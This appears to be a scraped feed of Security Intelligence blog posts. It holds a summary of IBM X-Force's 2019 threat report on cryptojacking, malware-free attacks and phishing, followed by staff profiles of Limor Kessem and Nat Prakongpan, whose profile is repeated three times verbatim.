Ransomware attacks declined by 45 percent between Q1 2018 and Q4 2018, according to the research. That doesn’t mean cybercrime is on the decline, however. Instead, cybercriminals employed cryptojacking, the stealthy theft of computing power to generate cryptocurrency, at a much higher rate. Cryptojacking surged by 450 percent over the course of 2018, according to the newly released “IBM X-Force Threat Intelligence Index 2019.”

Wendi Whitmore, global lead of the IBM X-Force Incident Response and Intelligence Services (IRIS) team, said in an interview that ransomware was highly successful for several years, but the payoff was starting to decline.

“It appears, for a variety of reasons, cybercriminals are getting less money from ransomware attacks and potentially getting a better return on their investment and their time from cryptojacking,” Whitmore said.

IBM X-Force observed a 45 percent decline in ransomware attacks and a 450 percent increase in cryptojacking over the course of 2018, as shown by the trend lines in this chart.

Cryptojacking and Other Stealth Attacks

The term cryptojacking refers to the illicit use of computing resources to generate cryptocurrency such as bitcoin, which peaked in value at nearly $20,000 in late 2017, and Monero, which has generated millions of dollars for cybercriminals over the past decade.

Cryptojacking involves infecting a victim’s computer with malware or through browser-based injection attacks. The malware uses the processing power of the hijacked computer to mine (generate) cryptocurrency. The spike in central processing unit (CPU) usage may cause systems to slow, and enterprises may be affected by the presence of the malware on their network servers and employee devices.

While less destructive than ransomware, the presence of cryptomining malware in enterprise environments is concerning because it indicates a vulnerability that may be exploited in other attacks.

“The victim doesn’t usually know their computer has taken over for that purpose,” Whitmore said.

Yet an even stealthier form of attack doesn’t use malware at all. More than half of cyberattacks (57 percent) seen by X-Force IRIS in 2018 did not leverage malware, and many involved the use of nonmalicious tools, including PowerShell, PsExec and other legitimate administrative solutions, allowing attackers to “live off the land” and potentially remain in IT environments longer. These attacks could allow cybercriminals to harvest credentials, run queries, search databases, access user directories and connect to systems of interest.

Attacks that don’t use malware are much more challenging for defense teams to detect, Whitmore said, because they are leveraging tools built into the environment and can’t be identified through signatures or typical malware detection techniques. Instead, defense teams need to detect malicious commands, communications and other actions that might look like legitimate business processes.

“Attackers are identifying that it’s a lot easier to stay in an organization longer-term if they don’t install anything funny that might get detected by a wide variety of technologies, or by really smart defenders who are constantly looking in the environment to identify something that’s new or different,” Whitmore said.

Attackers are infiltrating IT environments with stealthy techniques that target misconfigurations and other system vulnerabilities, Whitmore said, and using tried-and-true methods that are still very difficult to prevent at a wide scale, such as phishing. Publicly disclosed security incidents involving misconfiguration increased by 20 percent between 2017 and 2018, according to X-Force research. Meanwhile, IBM X-Force Red, an autonomous team of veteran hackers within IBM Security who conduct various types of hardware and software vulnerability testing, finds an average 1,440 unique vulnerabilities per organization.

Still, humans represent one of the largest security weaknesses, with 29 percent of attacks analyzed by IBM X-Force involving compromises via phishing emails. Nearly half (45 percent) of those phishing attempts were business email compromise (BEC) scams, also known as CEO fraud or whaling attacks.

These highly targeted attacks are aimed at individuals responsible for making payments from business accounts, claiming to come from someone inside the organization such as the CEO or chief financial officer (CFO). The FBI reported that between October 2013 and May 2018, BEC fraud had cost organizations $12.5 billion.

Read the complete X-Force Threat Intelligence Index Report

Transportation in the Crosshairs

Among the more surprising findings in this year’s X-Force Threat Intelligence Index report is the level of attacks on the transportation industry, which was the second-most attacked industry in 2018, behind only financial services. In 2017, transportation was the 10th most targeted industry, but in 2018 it was targeted in 13 percent of attacks, behind financial services, which was targeted in 19 percent of attacks.

“That was a pretty surprising finding for us,” Whitmore said. “To see the transportation industry emerge as the second-most impacted industry really means that we’re seeing a lot more activity overall in that industry.”

A few factors changed the game this year, Whitmore noted, including the industry’s growing reliance on data, website applications and mobile apps, and the increasing amount of information consumers are sharing. Transportation companies hold valuable customer data such as payment card information, personally identifiable information (PII) and loyalty rewards accounts. Cybercriminals are interested in targeting that information to monetize it.

Additionally, Whitmore said, there’s “a widespread attack surface in the transportation industry, leveraging things like third-party providers with legacy systems and a lot of communications systems that are out of their direct management.”

Proactive Defenses and Agile Response

There are signs that organizations are increasing their security hygiene by applying best practices such as access controls, patching vulnerabilities in software and hardware, and training employees to spot phishing attempts, Whitmore said.

Yet cybersecurity is a daily fight, and the security skills gap means security teams have to be agile and collaborative while augmenting their capabilities with supporting security technologies and services.

The IBM X-Force Threat Intelligence report offers recommendations for organizations to increase preparedness through preventive measures such as threat hunting — proactively searching networks and endpoints for advanced threats that evade prevention and detection tools.

Additionally, risk management models need to consider likely threat actors, infection methods and potential impact to critical business processes. Organizations need to be aware of risks arising from third parties, such as cloud service providers, suppliers and acquisitions.

Finally, the IBM X-Force Threat Intelligence Index emphasizes remediation and incident response. Even organizations with a mature security posture may not know how to respond to a security incident. Effective incident response is not only a technical matter; leadership and crisis communications are key to rapid response and quickly resuming business operations.

Read the complete X-Force Threat Intelligence Index Report

The post Cryptojacking Rises 450 Percent as Cybercriminals Pivot From Ransomware to Stealthier Attacks appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: John Zorabedian

Cybercrime, Fraud Protection, Research, Security Awareness, Security Leadership, Security Research, Threat Intelligence, Voices of Security,

Global Cyber Intelligence Maven Limor Kessem Is a Guiding Light for Women in Security

Next time someone says it’s difficult for women to advance in the global security or technology sector, point them in the direction of IBM. At the very top of the tree is Ginni Rometty, global CEO, who is joined by Shamla Naidoo as the chief information security officer (CISO) — just two of the many female executives across the company, all supported by very woman-friendly policies and culture.

That IBM is so supportive of women in security is a source of great pride for Limor Kessem, executive security advisor at IBM Security. Limor herself is an incredibly inspiring woman, having made a U-turn from naturopathic medicine and microbiology to leading governance, risk management and compliance (GRC) processes for content at IBM Security. Today, Limor works with global research groups to deliver actionable threat intelligence and is, without a doubt, one of the company’s top cyber intelligence experts.

“IBM is not a boys’ club; it’s not somewhere only men can move forward,” she says with conviction from her home office, her new baby sleeping soundly in another room. “A lot of executives at IBM are women, which is amazing, and I love it.”

She then lists some of the initiatives the company has in place, from career re-entry for women who left work to raise a family to cybersecurity camps for girls and funding conference tickets for women. Not surprisingly, Limor leads by example, always ready and willing to speak about her experiences as a woman in cybersecurity to anyone who’ll listen at conferences and events, in the corridors at work, and even on social media.

A New Collar Approach Brings New Perspectives to Cybersecurity

She might be a security evangelist today, but Limor’s original plan was to go into naturopathic medicine. She studied microbiology at McGill University in Montreal before changing her mind and moving to naturopathic medicine next.

When she left Canada and moved back to her birthplace, Israel, Limor planned to open her own clinic. She started to investigate entrepreneurial support for women, possible funding sources and even had business cards made up. But one day, on a whim, she decided to translate her CV from French to “terrible Hebrew” and send it out. A security company called her in for an interview.

“I was like, OK, I’ll go check it out, maybe there will be some cash for now, who knows. And it just ended up being this huge life-changing thing,” she recalls.

While the term wasn’t in use yet, Limor thus entered the cybersecurity field as a new collar hire. This is a deliberate hiring practice encouraged by IBM and other companies in which people from different backgrounds and education levels are brought on board with the aim of repurposing their skills for security. IBM, for instance, recognizes the value of military experience and regularly hires veterans for work in incident response. In Limor’s case, the skill she could repurpose was her ability to translate very technical information into something that is easily understood and actionable.

“You take what you’re strong with and the talents you have, and you still get to enjoy them just doing something completely different,” she says. “A lot of people ask me how do I connect my education, my knowledge from microbiology to what you do now? I’m like, hello — viruses!”

Diving Headfirst Into the Fascinating World of Cybercrime

Limor has barely stood still since she joined the global security sector about a decade ago. Back then, she was working in “probably the biggest research lab in the world,” at a time when not many vendors were doing underground and malware research. The processes that exist today hadn’t been defined yet, and the amount of cybercriminal activity taking place on the internet was not widely known. As Limor puts it, she was seeing “crazy stuff” happening in front of her eyes that no one else really knew about.

“Once I found out more about this fascinating world, I developed an immense passion for it,” she recalls. “I started teaching myself, reading everything I could read. I used to spend nights until 1 or 2 a.m. just reading and reading.

“I would sit in the company’s research lab with the malware researchers, the reverse engineers, the cryptography experts. I used to sit with the cyber intelligence folks who would be monitoring dark web forums and chat rooms and speaking undercover to criminals. I couldn’t get enough.”

A Security Manager’s Best Friend

All those conversations and late-night reading sessions paid off. Soon, Limor was spotted by a high-ranking colleague who saw her knowledge as something that should be spread wider — over conference stages. He entrusted her with one of his own speaking opportunities, and she hasn’t stopped since. Limor became a global security evangelist, traveling the world speaking to groups that wanted to know more about the threat landscape: banks, police task forces, military groups and peers. She would explain in detail what they would see in the research labs, what they were digging up that might be relevant to that specific group. And yet Limor herself was still learning, still growing.

Limor Kessem speaks at a cybersecurity conference

Today, she channels that learning and growth into IBM’s threat research, working with all the company’s research teams to implement a strong governance, risk management and compliance (GRC) process and ensure anything released under the IBM Security name is on-message, approved by all involved and, most importantly, useful to security managers seeking information. She brings in researchers, writers and reviewers and works with lawyers from every department, with colleagues across all teams and regions.

“I work with an ecosystem of people who help me be fair and just to everything and everyone that’s involved in a publication like that,” she says. “We’re really helping the community, helping security managers to do their jobs. One of the biggest things any security manager needs to be able to do to properly estimate risks and controls is to understand the threat landscape.”

Limor is essentially the educational editor-in-chief, with her immense security knowledge and a palpable passion for the subject.

And she really goes to bat for those security managers. In a recent interview, she talked about their day-to-day work: A team comes to them wanting a new website, but it’s not as simple as that. The IT manager must consider factors such as the number of customers the site will serve per day, the infrastructure architecture and number of servers needed, but security will have to bring in the right controls, encryption processes, identity management and more. It’s this type of work that requires reliable information about the current threat landscape as it pertains to different projects, and this is what she strives to help deliver to security professionals and management.

A Cry of Support for Women in Security

Limor has spent her adult life to date working in operations and now in risk management, two areas that are informing her latest adventure: motherhood. She’s throwing herself into that role with as much gusto as her ever-growing security responsibilities, showing that women don’t have to make a choice when it comes to careers versus families.

“Don’t think if you have a baby your career is over. It’s not,” Limor says. “If you work for a good organization that supports women, your career is going to stay intact, and you’ll come back with a bang.

“Women should feel good about that and should know that there are other women who are doing it and have had kids and are doing just as well in their careers in security. Not saying it’s easy, because many mothers know it is not, so I hope that organizations in the security sphere make profound changes to their culture to help keep more women on their teams!”

As though on cue, Limor’s own baby daughter lets out a wail in the background, a little cry of support for her mother — an additional cheerleader alongside a very woman-friendly workplace. And Limor is doing her best to make sure that her baby can, if she chooses, follow in her mother’s footsteps and blaze new trails for women in security.

The post Global Cyber Intelligence Maven Limor Kessem Is a Guiding Light for Women in Security appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Security Intelligence Staff

Enterprise Security, IBM Cyber Range, Incident Response, Network, Network Protection, Security Services, Threat Intelligence,

How Nat Prakongpan Found His Home on the Cyber Range

While most kids were bickering with siblings and fawning over the newest toys, young Nat Prakongpan was building an enterprise network for his school.

Before he became senior manager at the IBM Integration and Threat Intelligence Lab and built a state-of-the-art cyber range from the ground up, Nat spent his childhood in Thailand surrounded by computers. He started programming at age five. At 13, he was certified in network security by one of Thailand’s national labs.

Such was his passion for computing that he stopped going to school in grade six to teach himself at home and later earn a GED — though Nat is quick to point out that his old school let him hang around without attending class, so he was “socialized.”

“When everyone was in class, I was building the computer lab,” Nat laughs. “That’s how I gained experience in building an enterprise network when I was in grade seven.”

That’s right — Nat built his school’s entire network, deploying around 500 machines with everything an enterprise network needed at that time. But this was right as the internet was starting to boom, and, of course, the system was compromised.

“That’s how I quickly pivoted to learning security,” says Nat. “I took more certification classes when I was 15 and was ultimately able to secure that network.”

From Wunderkind to Network Security Expert

So how does a Thai child genius end up in Atlanta tinkering with IBM Security products to get them to talk to each other? If you ask Nat, it was a “total fluke” — in fact, he said much of his adult life is comprised of a series of happy accidents that led him to build IBM’s Cyber Range from the ground up.

The way Nat tells it, he had a few months between finishing his home-schooling and starting university, so he came to the U.S. to stay with his brother-in-law (who was then earning his master’s degree at the University of Florida) and attend an English-language school. His mother encouraged him to apply at the same university and, much to Nat’s surprise, he was accepted, so he stayed for the five years it took to earn his degree in computer engineering.

Like many of his classmates, he struggled to land a good job right out of school. Cue the next happy accident: A friend dragged him along to an information session by Internet Security Systems (ISS) at his alma mater. He had a chat with the team, and they called him at 7 a.m. the next day and asked him to come in for an interview “now.” He got the job and moved to Atlanta.

In an alternate universe, Nat would have led a very different life.

“I would probably have gone to a technical school somewhere in Thailand and worked at some corporation,” he says. “The U.S. and the job I’m in right now is more research and development, but a lot of jobs in Thailand or in Asia are more product users — looking for products to buy versus what we need to build to make things happen. It would be a lot less interesting.”

Home on the Cyber Range

Instead, Nat ended up at IBM Security following IBM’s acquisition of ISS. Still in Atlanta, he now leads the team that ensures all the individual products from IBM Security can work with and talk to each other to provide seamless end-to-end security for customers.

“We write the glue for those products that makes them work together,” he says. “None of them work together out of the box, but my team has the knowledge across all their areas of expertise to make one story from end to end.”

But Nat’s proudest achievement is the IBM Cyber Range in Cambridge, Massachusetts, the first-ever commercial cyber simulator offering a virtual environment in which companies can interact with real-world scenarios to bolster their threat protection and response capabilities. It’s his baby; he architected the technology, got the funding and designed the scenarios. Nat’s team then created a fictional global corporation with around 3,000 virtual workers, built an enterprise network and invented threats. The end result is a fully immersive simulation developed solely to help organizations and individuals learn about crisis situations and improve their incident response skills.

“The training in the Cyber Range is the ultimate success that I have so far: to be able to teach people and pass on the knowledge of best practices,” he says.

Nat may be among the few who built the facility, but he certainly isn’t the only one who recognizes its value. With the Cambridge location now booked more than half a year out, the IBM team set about its next challenge: taking the cyber simulator experience on tour.

IBMer Nat Prakongpan Found His Home on the Cyber Range

Taking the Range on the Road

“One of the things we’ve learned is that our customers invest a lot of time and resources to come though the Cyber Range in Cambridge,” Nat reflects. “It is difficult for a client to bring all its high-level executives into the same location on the same day.

“We were also having a hard time deciding which IBM office would be the host of our next cyber range.”

At this point, the team began exploring more flexible options that would allow the greatest number of people to benefit from the cyber simulation experience. Ultimately, Nat and his colleagues built the first-of-its-kind IBM X-Force Command Cyber Tactical Operations Center (C-TOC).

The C-TOC is not just a state-of-the-art cyber simulation on wheels — Nat proudly explains that it is “a real security operations center (SOC) able to serve live events such as high profile conferences and sporting events.” And to top it all off, the C-TOC is designed to respond to a live attack.

“We can drive up to a client’s site and be able to monitor the attack, as well as perform forensic investigation on systems and networks,” Nat says.

Bringing the C-TOC from a dream to reality involved many of the same technical challenges as creating the Cambridge Cyber Range. The C-TOC, however, is a mobile unit built from the ground up, and Nat’s team therefore had a host of additional considerations to account for, including materials, lighting, electrical, air conditioning, ventilation and more. And to top it all off, they had to maintain compliance with motor vehicle regulations in the U.S. and Europe and ensure that all the technology deployed within the unit would be able to survive the twists and turns of the road.

Nat remembers the first time he heard the C-TOC idea mentioned by IBM Security VP Caleb Barlow.

“Obviously my first thought was that this is a great idea and there are so many possibilities for what we can do with this mobile platform,” he recalls. “My second thought, after I had a little more time, was, ‘Wow, I am going to be responsible for making this all happen!’”

To the surprise of none of his teammates, Nat overcame the obstacles associated with the project, and the C-TOC rolled into action in October 2018. This month, the mobile cyber range will begin a tour of Europe, bringing real-world cyber incident training across the continent.

For Nat, the most rewarding aspect of his involvement with both the Cambridge Cyber Range and the C-TOC has been the responses from IBM customers.

“The excitement we have seen over these projects was phenomenal,” he says. “I think the C-TOC especially also inspires the next generation of youngsters and college students to see what’s possible in cybersecurity and how they can be involved.”

Meet X-Force Command Center Creative Director Allison Ritter

The post How Nat Prakongpan Found His Home on the Cyber Range appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Lauren McMenemy

Enterprise Security, IBM Cyber Range, Incident Response, Network, Network Protection, Security Services, Threat Intelligence,

How Nat Prakongpan Found His Home on the Cyber Range

While most kids were bickering with siblings and fawning over the newest toys, young Nat Prakongpan was building an enterprise network for his school.

Before he became senior manager at the IBM Integration and Threat Intelligence Lab and built a state-of-the-art cyber range from the ground up, Nat spent his childhood in Thailand surrounded by computers. He started programming at age five. At 13, he was certified in network security by one of Thailand’s national labs.

Such was his passion for computing that he stopped going to school in grade six to teach himself at home and later earn a GED — though Nat is quick to point out that his old school let him hang around without attending class, so he was “socialized.”

“When everyone was in class, I was building the computer lab,” Nat laughs. “That’s how I gained experience in building an enterprise network when I was in grade seven.”

That’s right — Nat built his school’s entire network, deploying around 500 machines with everything an enterprise network needed at that time. But this was right as the internet was starting to boom, and, of course, the system was compromised.

“That’s how I quickly pivoted to learning security,” says Nat. “I took more certification classes when I was 15 and was ultimately able to secure that network.”

From Wunderkind to Network Security Expert

So how does a Thai child genius end up in Atlanta tinkering with IBM Security products to get them to talk to each other? If you ask Nat, it was a “total fluke” — in fact, he said much of his adult life is comprised of a series of happy accidents that led him to build IBM’s Cyber Range from the ground up.

The way Nat tells it, he had a few months between finishing his home-schooling and starting university, so he came to the U.S. to stay with his brother-in-law (who was then earning his master’s degree at the University of Florida) and attend an English-language school. His mother encouraged him to apply at the same university and, much to Nat’s surprise, he was accepted, so he stayed for the five years it took to earn his degree in computer engineering.

Like many of his classmates, he struggled to land a good job right out of school. Cue the next happy accident: A friend dragged him along to an information session by Internet Security Systems (ISS) at his alma mater. He had a chat with the team, and they called him at 7 a.m. the next day and asked him to come in for an interview “now.” He got the job and moved to Atlanta.

In an alternate universe, Nat would have led a very different life.

“I would probably have gone to a technical school somewhere in Thailand and worked at some corporation,” he says. “The U.S. and the job I’m in right now is more research and development, but a lot of jobs in Thailand or in Asia are more product users — looking for products to buy versus what we need to build to make things happen. It would be a lot less interesting.”

Home on the Cyber Range

Instead, Nat ended up at IBM Security following IBM’s acquisition of ISS. Still in Atlanta, he now leads the team that ensures all the individual products from IBM Security can work with and talk to each other to provide seamless end-to-end security for customers.

“We write the glue for those products that makes them work together,” he says. “None of them work together out of the box, but my team has the knowledge across all their areas of expertise to make one story from end to end.”

But Nat’s proudest achievement is the IBM Cyber Range in Cambridge, Massachusetts, the first-ever commercial cyber simulator offering a virtual environment in which companies can interact with real-world scenarios to bolster their threat protection and response capabilities. It’s his baby; he architected the technology, got the funding and designed the scenarios. Nat’s team then created a fictional global corporation with around 3,000 virtual workers, built an enterprise network and invented threats. The end result is a fully immersive simulation developed solely to help organizations and individuals learn about crisis situations and improve their incident response skills.

“The training in the Cyber Range is the ultimate success that I have so far: to be able to teach people and pass on the knowledge of best practices,” he says.

Nat may be among the few who built the facility, but he certainly isn’t the only one who recognizes its value. With the Cambridge location now booked more than half a year out, the IBM team set about its next challenge: taking the cyber simulator experience on tour.

IBMer Nat Prakongpan Found His Home on the Cyber Range

Taking the Range on the Road

“One of the things we’ve learned is that our customers invest a lot of time and resources to come though the Cyber Range in Cambridge,” Nat reflects. “It is difficult for a client to bring all its high-level executives into the same location on the same day.

“We were also having a hard time deciding which IBM office would be the host of our next cyber range.”

At this point, the team began exploring more flexible options that would allow the greatest number of people to benefit from the cyber simulation experience. Ultimately, Nat and his colleagues built the first-of-its-kind IBM X-Force Command Cyber Tactical Operations Center (C-TOC).

The C-TOC is not just a state-of-the-art cyber simulation on wheels — Nat proudly explains that it is “a real security operations center (SOC) able to serve live events such as high profile conferences and sporting events.” And to top it all off, the C-TOC is designed to respond to a live attack.

“We can drive up to a client’s site and be able to monitor the attack, as well as perform forensic investigation on systems and networks,” Nat says.

Bringing the C-TOC from a dream to reality involved many of the same technical challenges as creating the Cambridge Cyber Range. The C-TOC, however, is a mobile unit built from the ground up, and Nat’s team therefore had a host of additional considerations to account for, including materials, lighting, electrical, air conditioning, ventilation and more. And to top it all off, they had to maintain compliance with motor vehicle regulations in the U.S. and Europe and ensure that all the technology deployed within the unit would be able to survive the twists and turns of the road.

Nat remembers the first time he heard the C-TOC idea mentioned by IBM Security VP Caleb Barlow.

“Obviously my first thought was that this is a great idea and there are so many possibilities for what we can do with this mobile platform,” he recalls. “My second thought, after I had a little more time, was, ‘Wow, I am going to be responsible for making this all happen!’”

To the surprise of none of his teammates, Nat overcame the obstacles associated with the project, and the C-TOC rolled into action in October 2018. This month, the mobile cyber range will begin a tour of Europe, bringing real-world cyber incident training across the continent.

For Nat, the most rewarding aspect of his involvement with both the Cambridge Cyber Range and the C-TOC has been the responses from IBM customers.

“The excitement we have seen over these projects was phenomenal,” he says. “I think the C-TOC especially also inspires the next generation of youngsters and college students to see what’s possible in cybersecurity and how they can be involved.”

Meet X-Force Command Center Creative Director Allison Ritter

The post How Nat Prakongpan Found His Home on the Cyber Range appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Lauren McMenemy

Enterprise Security, IBM Cyber Range, Incident Response, Network, Network Protection, Security Services, Threat Intelligence,

How Nat Prakongpan Found His Home on the Cyber Range

While most kids were bickering with siblings and fawning over the newest toys, young Nat Prakongpan was building an enterprise network for his school.

Before he became senior manager at the IBM Integration and Threat Intelligence Lab and built a state-of-the-art cyber range from the ground up, Nat spent his childhood in Thailand surrounded by computers. He started programming at age five. At 13, he was certified in network security by one of Thailand’s national labs.

Such was his passion for computing that he stopped going to school in grade six to teach himself at home and later earn a GED — though Nat is quick to point out that his old school let him hang around without attending class, so he was “socialized.”

“When everyone was in class, I was building the computer lab,” Nat laughs. “That’s how I gained experience in building an enterprise network when I was in grade seven.”

That’s right — Nat built his school’s entire network, deploying around 500 machines with everything an enterprise network needed at that time. But this was right as the internet was starting to boom, and, of course, the system was compromised.

“That’s how I quickly pivoted to learning security,” says Nat. “I took more certification classes when I was 15 and was ultimately able to secure that network.”

From Wunderkind to Network Security Expert

So how does a Thai child genius end up in Atlanta tinkering with IBM Security products to get them to talk to each other? If you ask Nat, it was a “total fluke” — in fact, he said much of his adult life is comprised of a series of happy accidents that led him to build IBM’s Cyber Range from the ground up.

The way Nat tells it, he had a few months between finishing his home-schooling and starting university, so he came to the U.S. to stay with his brother-in-law (who was then earning his master’s degree at the University of Florida) and attend an English-language school. His mother encouraged him to apply at the same university and, much to Nat’s surprise, he was accepted, so he stayed for the five years it took to earn his degree in computer engineering.

Like many of his classmates, he struggled to land a good job right out of school. Cue the next happy accident: A friend dragged him along to an information session by Internet Security Systems (ISS) at his alma mater. He had a chat with the team, and they called him at 7 a.m. the next day and asked him to come in for an interview “now.” He got the job and moved to Atlanta.

In an alternate universe, Nat would have led a very different life.

“I would probably have gone to a technical school somewhere in Thailand and worked at some corporation,” he says. “The U.S. and the job I’m in right now is more research and development, but a lot of jobs in Thailand or in Asia are more product users — looking for products to buy versus what we need to build to make things happen. It would be a lot less interesting.”

Home on the Cyber Range

Instead, Nat ended up at IBM Security following IBM’s acquisition of ISS. Still in Atlanta, he now leads the team that ensures all the individual products from IBM Security can work with and talk to each other to provide seamless end-to-end security for customers.

“We write the glue for those products that makes them work together,” he says. “None of them work together out of the box, but my team has the knowledge across all their areas of expertise to make one story from end to end.”

But Nat’s proudest achievement is the IBM Cyber Range in Cambridge, Massachusetts, the first-ever commercial cyber simulator offering a virtual environment in which companies can interact with real-world scenarios to bolster their threat protection and response capabilities. It’s his baby; he architected the technology, got the funding and designed the scenarios. Nat’s team then created a fictional global corporation with around 3,000 virtual workers, built an enterprise network and invented threats. The end result is a fully immersive simulation developed solely to help organizations and individuals learn about crisis situations and improve their incident response skills.

“The training in the Cyber Range is the ultimate success that I have so far: to be able to teach people and pass on the knowledge of best practices,” he says.

Nat may be among the few who built the facility, but he certainly isn’t the only one who recognizes its value. With the Cambridge location now booked more than half a year out, the IBM team set about its next challenge: taking the cyber simulator experience on tour.

IBMer Nat Prakongpan Found His Home on the Cyber Range

Taking the Range on the Road

“One of the things we’ve learned is that our customers invest a lot of time and resources to come though the Cyber Range in Cambridge,” Nat reflects. “It is difficult for a client to bring all its high-level executives into the same location on the same day.

“We were also having a hard time deciding which IBM office would be the host of our next cyber range.”

At this point, the team began exploring more flexible options that would allow the greatest number of people to benefit from the cyber simulation experience. Ultimately, Nat and his colleagues built the first-of-its-kind IBM X-Force Command Cyber Tactical Operations Center (C-TOC).

The C-TOC is not just a state-of-the-art cyber simulation on wheels — Nat proudly explains that it is “a real security operations center (SOC) able to serve live events such as high profile conferences and sporting events.” And to top it all off, the C-TOC is designed to respond to a live attack.

“We can drive up to a client’s site and be able to monitor the attack, as well as perform forensic investigation on systems and networks,” Nat says.

Bringing the C-TOC from a dream to reality involved many of the same technical challenges as creating the Cambridge Cyber Range. The C-TOC, however, is a mobile unit built from the ground up, and Nat’s team therefore had a host of additional considerations to account for, including materials, lighting, electrical, air conditioning, ventilation and more. And to top it all off, they had to maintain compliance with motor vehicle regulations in the U.S. and Europe and ensure that all the technology deployed within the unit would be able to survive the twists and turns of the road.

Nat remembers the first time he heard the C-TOC idea mentioned by IBM Security VP Caleb Barlow.

“Obviously my first thought was that this is a great idea and there are so many possibilities for what we can do with this mobile platform,” he recalls. “My second thought, after I had a little more time, was, ‘Wow, I am going to be responsible for making this all happen!’”

To the surprise of none of his teammates, Nat overcame the obstacles associated with the project, and the C-TOC rolled into action in October 2018. This month, the mobile cyber range will begin a tour of Europe, bringing real-world cyber incident training across the continent.

For Nat, the most rewarding aspect of his involvement with both the Cambridge Cyber Range and the C-TOC has been the responses from IBM customers.

“The excitement we have seen over these projects was phenomenal,” he says. “I think the C-TOC especially also inspires the next generation of youngsters and college students to see what’s possible in cybersecurity and how they can be involved.”

Meet X-Force Command Center Creative Director Allison Ritter

The post How Nat Prakongpan Found His Home on the Cyber Range appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Lauren McMenemy